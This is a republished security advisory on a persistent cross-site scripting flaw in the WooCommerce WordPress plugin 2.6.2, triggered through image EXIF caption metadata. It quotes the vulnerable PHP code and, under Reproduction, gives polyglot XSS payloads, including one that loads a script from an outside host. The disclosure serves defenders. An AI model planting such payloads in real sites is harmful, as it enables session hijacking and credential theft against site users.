WordPress WooCommerce plugin version 2.6.2 suffers from a cross site scripting vulnerability.
a5f0af318f11ee0e790f9fb5900db8a34e7b925b850843f7eeed1f9c5e73b2f8------------------------------------------------------------------------
Persistent Cross-Site Scripting in WooCommerce using image metadata
(EXIF)
------------------------------------------------------------------------
Han Sahin, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WooCommerce WordPress Plugin (millions of active installations). An
attacker can create a specially crafted image file which, when uploaded
as a product image in WordPress, injects malicious JavaScript code into
the application. An attacker can use this vulnerability to perform a
wide variety of actions, such as stealing victims' session tokens or
login credentials, and performing arbitrary actions on their behalf.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160720-0006
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WooCommerce version 2.6.2.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WooCommerce 2.6.3.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_using_image_metadata__exif_.html
WooCommerce uses meta data from an image file to fill in the 'Caption' section of an uploaded image in WordPress. Meta data of an image must be treated as untrusted user input and can be manipulated using an Exchangeable Image File Format (EXIF) editor. A vulnerability was found in the way WooCommerce processes meta data (Caption). Using a specially crafted image it is possible to trigger a Cross-Site Scripting condition in WooCommerce.
It is difficult for a WP admin to determine if an image contains a malicious meta data. An attacker can craft and spread a popular image via social media with malicious Cross-Site Scripting payload that will be used as Caption by WooCommerce. When an admin upload this image as product image and gallery item without properly checking meta data it is possible to malicious scripting code is injected in the WooCommerce site. An attacker can use this vulnerability to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, and performing arbitrary actions on their behalf.
The code fragment below shows that meta data is used for the caption and title of an image.
function wc_rest_set_uploaded_image_as_attachment( $upload, $id = 0 ) {
$info = wp_check_filetype( $upload['file'] );
$title = '';
$content = '';
if ( ! function_exists( 'wp_generate_attachment_metadata' ) ) {
include_once( ABSPATH . 'wp-admin/includes/image.php' );
}
if ( $image_meta = wp_read_image_metadata( $upload['file'] ) ) {
if ( trim( $image_meta['title'] ) && ! is_numeric( sanitize_title( $image_meta['title'] ) ) ) {
$title = $image_meta['title'];
}
if ( trim( $image_meta['caption'] ) ) {
$content = $image_meta['caption'];
}
}
$attachment = array(
'post_mime_type' => $info['type'],
'guid' => $upload['url'],
'post_parent' => $id,
'post_title' => $title,
'post_content' => $content,
);
$attachment_id = wp_insert_attachment( $attachment, $upload['file'], $id );
if ( ! is_wp_error( $attachment_id ) ) {
wp_update_attachment_metadata( $attachment_id, wp_generate_attachment_metadata( $attachment_id, $upload['file'] ) );
}
return $attachment_id;
}
As seen in the code listing below the output of the meta data is not properly encoded, resulting in persistent Cross-Site Scripting.
<div class="images">
<?php
if ( has_post_thumbnail() ) {
$attachment_count = count( $product->get_gallery_attachment_ids() );
$gallery = $attachment_count > 0 ? '[product-gallery]' : '';
$props = wc_get_product_attachment_props( get_post_thumbnail_id(), $post );
$image = get_the_post_thumbnail( $post->ID, apply_filters( 'single_product_large_thumbnail_size', 'shop_single' ), array(
'title' => $props['title'],
'alt' => $props['alt'],
) );
echo apply_filters( 'woocommerce_single_product_image_html', sprintf( '<a href="%s" itemprop="image" class="woocommerce-main-image zoom" title="%s" data-rel="prettyPhoto' . $gallery . '">%s</a>', $props['url'], $props['caption'], $image ), $post->ID );
} else {
echo apply_filters( 'woocommerce_single_product_image_html', sprintf( '<img src="%s" alt="%s" />', wc_placeholder_img_src(), __( 'Placeholder', 'woocommerce' ) ), $post->ID );
}
do_action( 'woocommerce_product_thumbnails' );
?>
</div>
Reproduction
The following two images can be user to reproduce this issue:
- Product image
- Gallery image
It is also possible to craft your own malicious image using an EXIF editor, the following payloads can be used:
Product image:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk='s=document.createElement(`script`);s.src=`https://sumofpwn.nl/js/jquery.js`;document.body.appendChild(s)
'//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed